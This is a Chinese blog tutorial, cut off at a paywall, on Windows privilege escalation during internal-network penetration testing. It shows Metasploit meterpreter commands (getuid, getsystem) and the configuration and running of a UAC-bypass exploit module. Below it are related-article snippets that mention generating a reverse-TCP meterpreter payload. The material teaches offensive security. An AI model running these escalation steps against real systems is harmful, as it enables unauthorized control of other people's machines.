【网络安全】内网渗透(二):权限提升

最新推荐文章于 2025-06-07 09:38:51 发布
最新推荐文章于 2025-06-07 09:38:51 发布
阅读量1.8k 收藏 19
点赞数 24
CC 4.0 BY-SA版权
文章标签: web安全 安全 网络 网络攻击 前端 网络安全 黑客
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wuli1024/article/details/135426893
本文介绍了内网渗透测试中提升系统权限的方法,包括查看用户权限、尝试提权、利用ShellExecute绕过UAC、使用bypassuac模块绕过UAC以及利用提权漏洞如ms14_058_track_popup_menu。同时,文章也关注了网络安全领域的就业现状和学习资源。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言

本博文仅供学习使用,请勿他用!!!

网络安全成为当下最热门的话题,如何维护网络安全是关键,而内网渗透测试又是其中最重要的部分,接下来博主将会通过系列文章,对内网渗透进行介绍与复现;

上篇博客获取到系统权限后,本文将会介绍如何提升获取到的系统权限,主要通过三种方式:提高程序运行级别,UAC 绕过,利用提权漏洞进行提权;

提高程序运行级别

1、查看当前的用户权限 getuid

meterpreter > getuid
Server username: WIN-50HM5UIKP60\sid10t

2、尝试提权 getsystem,这种成功的概率极小,果然报错了:

meterpreter > getsystem 
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)

→点击获取网络安全资料·攻略←

200多本网络安全系列电子书
网络安全标准题库资料
项目源码
网络安全基础入门、Linux、web安全、攻防方面的视频
网络安全学习路线图

3、把当前会话挂起 background,然后启用模块 use exploit/windows/local/ask,可以先通过 info 来查看一下这个模块的功能:

This module will attempt to elevate execution level using the ShellExecute undocumented RunAs flag to bypass low UAC settings. 此模块将尝试使用 ShellExecute undocumented RunAs 标志来提升执行级别,以绕过低 UAC 设置。

4、设置模块的一些属性:

  • FILENAME:弹出 UAC 显示的文件名;
  • PATH:文件路径;
  • SESSION:选择会话的 ID;

设置完属性之后,就开始攻击 exploit

msf exploit(ask) > set session 2
session => 2
msf exploit(ask) > set filename sid10t.exe
filename => sid10t.exe
msf exploit(ask) > exploit
最低0.47元/天 解锁文章

200万优质内容无限畅学
红队内网攻防渗透内网渗透内网对抗:Windows权限提升篇&溢出漏洞&土豆家族&通杀全系&补丁对比&EXP筛选
HACKONE的博客
05-30 207
红队内网攻防渗透1. 内网权限提升技术1.1 windows内网权限提升技术--手工篇 1. 内网权限提升技术 1.1 windows内网权限提升技术–手工篇
内网渗透——权限提升
cldimd的博客
03-23 829
目的: 有时候,通过某些方式(如上传Webshell)获取执行命令的shell,但是会因为限限制而无法执行某些命令。这时候为了“扩大战果”就需要利用,来让原本的低限(如只允许列目录)-->高限(拥有修改文件的能力)。 方式: 本地漏洞 数据库 第三方软件 本地漏洞window...
内网渗透常用方式总结
j1044957016的博客
06-01 8321
内网菜鸡艰难学习,希望一样的菜鸡能省去打开一堆链接的时间吧
渗透测试——权限提升
世间繁华梦一出
03-01 1982
一、什么是、怎样进行方式有哪些)1、系统漏洞(Linux、Windows) 一、什么是 就是通过各种办法和漏洞,升自己在服务器中的限,以便控制全局。 windows:User >> System linux: User >> Root 、怎样进行方式有哪些) 1、系统漏洞(Linux、Windows) 2、数据库 3、系统配置错误 4、限继承类 5、第三方软件/服务 6、WebServer漏洞 1、系统
红队视角:揭秘内网的技术迷宫
Python84310366的博客
06-07 583
红队内网技术是一把双刃剑,对于网络安全研究和防御测试有着重要的价值,但一旦被不法分子利用,就会对个人、企业乃至国家的网络安全造成巨大的威胁。通过对 Windows 和 Linux 系统常见技术的学习,以及实际案例的剖析,我们深入了解了的过程和方法。同时,我们也认识到,防范攻击需要从系统加固和安全监测等多个方面入手,构建一个全方位的网络安全防护体系。随着技术的不断发展,未来的技术可能会更加复杂和隐蔽,对安全防护出了更高的挑战。
内网渗透-权限提升
weixin_60329395的博客
08-26 1438
权限提升流程:信息收集-补丁筛选-利用MSF或特定EXP-西瓜到手漏洞库推荐:Vulmap、Wes、WindowsVulnScanwindows-exp-suggester在17年后未更新,不再推荐Vulmap是PowerShell脚本,使用最简单,但web往往只能有cmd窗口,不一定有PowerShell环境,导致该项目对Windows系统不友好Wes和WindowsVulnScan是python脚本,可以不借助PowerShell操作,更适用于web。...
内网渗透):权限提升
热门推荐
sid10t.
05-02 2万+
文章目录前言高程序运行级别UAC 绕过利用漏洞进行后记 前言 本博文仅供学习使用,请勿他用!!! 网络安全成为当下最热门的话题,如何维护网络安全是关键,而内网渗透测试又是其中最重要的部分,接下来博主将会通过系列文章,对内网渗透进行介绍与复现; 内网渗透(一):获得限 继上篇博客获取到系统限后,本文将会介绍如何升获取到的系统限,主要通过三种方式高程序运行级别,UAC 绕过,利用漏洞进行;   高程序运行级别 1、查看当前的用户限 getuid, meterprete
网络安全渗透实战:从外网打点到三层内网渗透及域控限获取全流程解析
最新发布
07-05
内容概要:本文档详细介绍了从外网打点到三层内网渗透的全过程,涵盖环境搭建、信息收集、SQL注入、编写脚本进行漏洞利用、获取WebShell、内网渗透、域渗透等多个方面。首先通过VPS映射将内部网络暴露于公网,利用...
内网渗透权限提升:MySQL权限提升漏洞复现
balalawb的博客
10-17 229
UDF漏洞复现
内网安全攻防渗透测试实战指南.pptx
07-01
内网安全攻防渗透测试实战指南 ...内网安全攻防渗透测试实战指南旨在帮助安全人员和渗透测试人员更好地理解内网安全攻防的原理和方法,并供了一些实用的技术和工具来帮助他们更好地进行内网渗透测试和安全攻防。
渗透测试之
Forget_liu的博客
05-06 603
主要针对网站测试过程中,当测试某一网站时,通过各种漏洞webshell限来拿到该服务器的限。此时已经获得了站点的webshell限,后获得服务器限,就可以对站点B,C进行操作。
内网渗透()
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
11-14 6607
对于内网渗透,到我们拿到了公网主机的限后,并获得了一些本机的信息时。我们首先得知道我们的限。如果获取到的是普通用户限,则我们需要想办法至管理员限。如果获得的已经是管理员限,则可以忽略这一步。对于Windows系统,只有到管理员限后,才可以运行mimikatz以及执行一些其他高限的操作。对于Linux系统,很多命令需要root限才能执行,只有到root限才能执行后面的信息收集等工作。
内网渗透 - - Windows
weixin_30855099的博客
08-22 334
MS MS16-135 MS16-016 框架 Sherlock 信息收集 ifconfig -a cat /etc/hosts arp -a route -n cat /proc/net/* ping扫描 跳板机环境分析 1.具备公网IP,所有端口可直接连接,且可访问外网 - 即可使用正向连接,又可以使用反向连接 2.跳板机受...
内网渗透 -- (利用漏洞)
Web安全工具库
06-27 895
沉默不是没有情绪,是感觉没有再说的意义。。。。 ---- 网易云热评 环境:小攻:Kali 2020,ip:192.168.1.133 小受:win7 x86,ip:192.168.1.137 一、生成木马 1、查看Windows下可利用的payloads msfvenom -l payloads | grep windows | grep tcp 2、选择windows/meterpreter/reverse_tcp并生成木马 -p 选择一个payload ...
关于内网渗透问题
weixin_48421613的博客
06-02 967
最近有小老弟问我,总有面试官问关于的问题,总是能把我难住。好吧,面试造航母干活 拧螺丝这句话在哪里都很实用,索性今天也就写一下我认为的。 首先呢,其实权限提升这种事情多用于内网渗透,这里指的内网渗透当然不是你处于内网环境的渗透测试,而是那种在攻防演练、护网、打击境外的一些特殊场景,由外网入侵到内网做后渗透的时候遇到的权限提升问题。(大佬勿喷,我实在想不到还有哪里做,正常安全评估是完全用不到这一项技能的,毕竟传统工艺点到为止) 什么是 主要针对在对网站的渗透过程中,通过利用网站或服务器系.
内网渗透系列:权限提升方法小结
闵行小鱼塘
07-30 854
小结下权限提升方法
内网渗透--linux
hee_mee的博客
07-28 592
zeroNIl
渗透测试-权限提升
weixin_46626737的博客
03-13 634
比如:C://program files/a.exe -f,windows识别到空格,认为后面是参数,正确的应该是”C://program files/a.exe“ -f。命令问题:利用tar压缩,文件名改为--参数类型,从而执行 ,利用定时任务,和SUID(其他命令也可,换文件名-参数)先获得webshell,然后进行上传一些文件,进行测试(msf或者手动的EXP),然后创建用户,开启端口,远程连接。假如在C://加一个program恶意文件exe后缀,再次执行,则该恶意文件会被执行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值